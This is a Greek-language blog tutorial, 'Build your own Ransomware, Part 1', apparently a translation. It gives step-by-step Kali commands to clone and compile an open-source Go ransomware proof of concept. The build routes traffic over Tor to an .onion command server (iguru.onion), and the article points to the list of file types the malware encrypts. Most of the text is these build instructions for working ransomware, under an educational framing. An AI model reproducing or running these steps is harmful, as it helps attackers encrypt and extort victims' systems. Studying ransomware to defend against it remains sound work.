Φτιάξτε το δικό σας Ransomware, (Μέρος 1ο)

Το Ransomware εξελίσσεται ταχύτατα στη σημαντικότερη μορφή κακόβουλου λογισμικού που πλήττει τα ψηφιακά μας συστήματα. Οι εταιρείες σε όλο τον κόσμο πλήττονται από διάφορες μορφές κακόβουλου λογισμικού, συμπεριλαμβανομένης της νέας παραλλαγής, Snake, που έχει σχεδιαστεί ειδικά για συστήματα SCADA/ICS. Ο αγωγός Colonial Pipeline στις ΗΠΑ έκλεισε για σχεδόν μια εβδομάδα πριν πληρώσει λύτρα ύψους 5 εκατομμυρίων δολαρίων, γεγονός που καταδεικνύει τον κίνδυνο που ενέχει αυτό το ransomware για τα βιομηχανικά συστήματα και τις υποδομές ενός έθνους.

Πρόσφατα, η μεγάλη αμερικανική ασφαλιστική εταιρεία, η CNA, παραδέχθηκε ότι κατέβαλε λύτρα ύψους 40 εκατομμυρίων δολαρίων! Δεν είναι περίεργο που οι προγραμματιστές ransomware γίνονται όλο και πιο δημιουργικοί και κακόβουλοι, γιατί τα ransomware πληρώνουν!

ransom

Για να κατανοήσουμε καλύτερα πώς λειτουργεί το ransomware, ας δημιουργήσουμε το δικό μας ransomware από ένα Proof of Concept (POC) που είναι διαθέσιμο από τον mauri870 στο github.com. Ο ίδιος ανέπτυξε αυτό το ransomware στο πλαίσιο του ακαδημαϊκού του προγράμματος και δεν έχει σχεδιαστεί για κακόβουλους σκοπούς, αλλά μάλλον για να μας βοηθήσει να κατανοήσουμε πώς λειτουργεί το ransomware. Το κακόβουλο λογισμικό είναι γραμμένο σε Golang όπως και τα περισσότερα.

Κρυπτογραφεί τα αρχεία στο παρασκήνιο με AES-256-CTR και χρησιμοποιεί RSA-4096 για να εξασφαλίσει την ανταλλαγή δεδομένων με τον διακομιστή. Το συγκεκριμένο ransomware μοιάζει πολύ με το Cryptolocker, μία από τις πιο επιτυχημένες επιθέσεις ransomware στην ιστορία.

Βήμα #1: Κατεβάστε και εγκαταστήστε τα Binaries

Το πρώτο βήμα είναι να ενεργοποιήσετε το Kali και να βεβαιωθείτε ότι η golang είναι εγκατεστημένη. Αν όχι, κατεβάστε το από τα αποθετήρια του Kali εισάγοντας,

kali > sudo apt install golang

Στη συνέχεια, θα πρέπει να συνδεθείτε ως χρήστης root.

kali > sudo su

ransom1

Τώρα δημιουργήστε έναν κατάλογο για τα binaries. Σε αυτή την περίπτωση, τον ονόμασα απλά “git”.

kali >mkdir git

Στη συνέχεια, αλλάξτε κατάλογο (cd) σε αυτόν τον κατάλογο.

kali > cd git

Έπειτα, κατεβάστε τα binaries από το github.

kali > git clone https://github.com/mauri870/ransomware

ransom2

Βήμα #2: Εξαγωγή μεταβλητών περιβάλλοντος GO

Στη συνέχεια, πρέπει να ορίσουμε μερικές μεταβλητές περιβάλλοντος για να κατευθύνουμε τα binaries και το GO στους κατάλληλους καταλόγους.

ransom3

Βήμα #3: Φτιάξτε τις εξαρτήσεις του πηγαίου κώδικα

Τώρα, με τις μεταβλητές ορισμένες και εξαγόμενες, πρέπει να δημιουργήσουμε τις εξαρτήσεις. Πλοηγηθείτε στο νέο κατάλογο, ransomware, και πληκτρολογήστε make deps.

kali > cd ransomware

kali > make deps

ransom4

Βήμα #4: Φτιάξτε τον πηγαίο κώδικα με επιλογές

Τώρα που έχουμε ολοκληρώσει το deps make, μπορούμε να αρχίσουμε να φτιάχνουμε τον πηγαίο κώδικα. Στην περίπτωσή μας, θα χρησιμοποιήσουμε μερικές επιλογές.

Πρώτον, θέλουμε να χρησιμοποιήσουμε το ToR για να κρυπτογραφήσουμε τις επικοινωνίες μας μέσω του δικτύου ToR.

USE_TOR=true

Δεύτερον, θέλουμε να χρησιμοποιήσουμε τον dark web server μας στο iguru.onion (μπορείτε να χρησιμοποιήσετε οποιοδήποτε domain ή localhost).

SERVER_HOST=iguru.onion

Τρίτον, θέλουμε να χρησιμοποιήσουμε τη θύρα 80 (μπορείτε να χρησιμοποιήσετε οποιαδήποτε θύρα).

SERVER_PORT=80

Τέλος, θέλουμε να ορίσουμε το λειτουργικό σύστημα για τη μεταγλώττιση του πηγαίου κώδικα για το λειτουργικό μας σύστημα, στην προκειμένη περίπτωση το Linux.

GOOS=linux

ransom5

Η εντολή μας θα πρέπει να μοιάζει κάπως έτσι,

kali > make -e USE_TOR=true SERVER_HOST=iguru.onion SERVER_PORT=80 GOOS=linux

Τέλος πατήστε ENTER και παρακολουθήστε τη σύνταξη του ransomware σας.

Βήμα #5: Ελέγξτε τον κατάλογο για το ransomware.exe

Μόλις δημιουργηθεί ο πηγαίος κώδικας, δείτε τη λίστα στον κατάλογο του ransomware.

kali > ls -l

ransom6

Τώρα, πλοηγηθείτε στον κατάλογο bin.

kali > cd bin

ransom7

Εδώ, θα δείτε το ransomware.exe, τον διακομιστή και το unlocker.exe.

Βήμα #6: Εξετάστε τους τύπους αρχείων προς κρυπτογράφηση

Αν θέλετε να δείτε ποιους τύπους αρχείων θα κρυπτογραφήσει το ransomware, μεταβείτε στον κατάλογο cmd και ανοίξτε το common.go

kali > cd cmd

kali > more common.go

ransom8

Εδώ, μπορείτε να δείτε τις επεκτάσεις αρχείων που το ransomware στοχεύει να κρυπτογραφήσει όταν εκτελεστεί.

Σύνοψη

Το Ransomware είναι ίσως η μεγαλύτερη απειλή για τα ψηφιακά μας συστήματα αυτή τη στιγμή. Όπως έδειξε ξεκάθαρα η επίθεση στον αγωγό Colonial Pipeline, σχεδόν όλοι είναι ευάλωτοι και αν παραβιαστούν τα συστήματα SCADA/ICS μπορεί να υπάρξουν σημαντικές οικονομικές επιπτώσεις και επιπτώσεις στις υποδομές!

Αυτό το ransomware POC θα σας βοηθήσει να κατανοήσετε καλύτερα το ransomware ως απειλή και να ελέγξετε αν τα συστήματά σας είναι ευάλωτα σε μια τέτοια επίθεση.

Στο δεύτερο μέρος αυτής της σειράς, θα δοκιμάσουμε αυτό το ransomware σε ένα Windows VM.

iGuRu.gr The Best Technology Site in Greeceggns

Get the best viral stories straight into your inbox!















ransomware

Written by Anastasis Vasileiadis

Οι μεταφράσεις είναι σαν τις γυναίκες. Όταν είναι ωραίες δεν είναι πιστές και όταν είναι πιστές δεν είναι ωραίες.

Αφήστε μια απάντηση

Η ηλ. διεύθυνση σας δεν δημοσιεύεται. Τα υποχρεωτικά πεδία σημειώνονται με *

Το μήνυμα σας δεν θα δημοσιευτεί εάν:
1. Περιέχει υβριστικά, συκοφαντικά, ρατσιστικά, προσβλητικά ή ανάρμοστα σχόλια.
2. Προκαλεί βλάβη σε ανηλίκους.
3. Παρενοχλεί την ιδιωτική ζωή και τα ατομικά και κοινωνικά δικαιώματα άλλων χρηστών.
4. Διαφημίζει προϊόντα ή υπηρεσίες ή διαδικτυακούς τόπους .
5. Περιέχει προσωπικές πληροφορίες (διεύθυνση, τηλέφωνο κλπ).